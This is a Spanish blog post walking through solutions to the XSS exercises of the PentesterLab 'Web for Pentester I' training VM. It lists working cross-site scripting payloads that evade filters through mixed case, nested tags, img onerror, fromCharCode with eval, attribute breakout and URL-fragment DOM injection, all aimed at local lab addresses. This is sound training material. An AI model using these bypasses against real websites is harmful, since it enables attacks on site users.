viernes, 4 de agosto de 2017

Web for pentesters I soluciones a los ejercicios XSS

Hola amigos:

Hoy, vamos a completar el primer post (ya hace más de un año) que hice. No pondré ningún enlace porque empezaré desde el principio.

Web for pentester I es una máquina virtual, perteneciente a pentesterlab, que nos ayuda a aprender seguridad en web. Tiene distintos ejemplos, XSS, Inyección SQL, etc. En el post de hoy, resolveremos los ejemplos de XSS.

Os la podréis descargar de https://pentesterlab.com/exercises/web_for_pentester

Ejemplo 1


Ejemplo 2

Aquí, la idea es cambiar las palabras script alternando mayúsculas y minúsculas para saltarnos el filtro. Da igual dónde las pongáis.

http://192.168.1.134/xss/example2.php?name=<scRipT>alert(“hola”)</SCrIpt>

Ejemplo 3

http://192.168.1.134/xss/example3.php?name=<sc<script>ript>alert("hola")</scri</script>pt>

Ejemplo 4

http://192.168.1.134/xss/example4.php?name=<img src="fsociety" onerror=alert("hola")>

Ejemplo 5

fromCharCode, que pertenece a String, convierte en cadena códigos decimales.

Le antepondremos eval para evaluar


http://192.168.1.134/xss/example5.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,104,111,108,97,34,41))</script>

Primero convertimos en cadena los códigos en decimal y después evaluamos el resultado.

Ejemplo 6

http://192.168.1.130/xss/example6.php?name=hacker";alert("hola");"

Ejemplo 7



Ejemplo 8

http://192.168.1.130/xss/example8.php/"><script>alert("hola")</script>

Aquí, estamos inyectando en la parte del código

<form action="/xss/example8.php" method="POST">
para que quede

<form action="/xss/example8.php/"><script>alert(“hola”)</script> method="POST">

Ejemplo 9
http://192.168.1.130/xss/example9.php#hacker<script>alert("hola")</script>

Ojito, no funciona con algunos navegadores, por ejemplo, en firefox no sale y en edge sí.

La idea es que poner el payload tras el símbolo de # (anclaje). Es de tipo XSS-DOM (Modelo de objetos del documento)

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.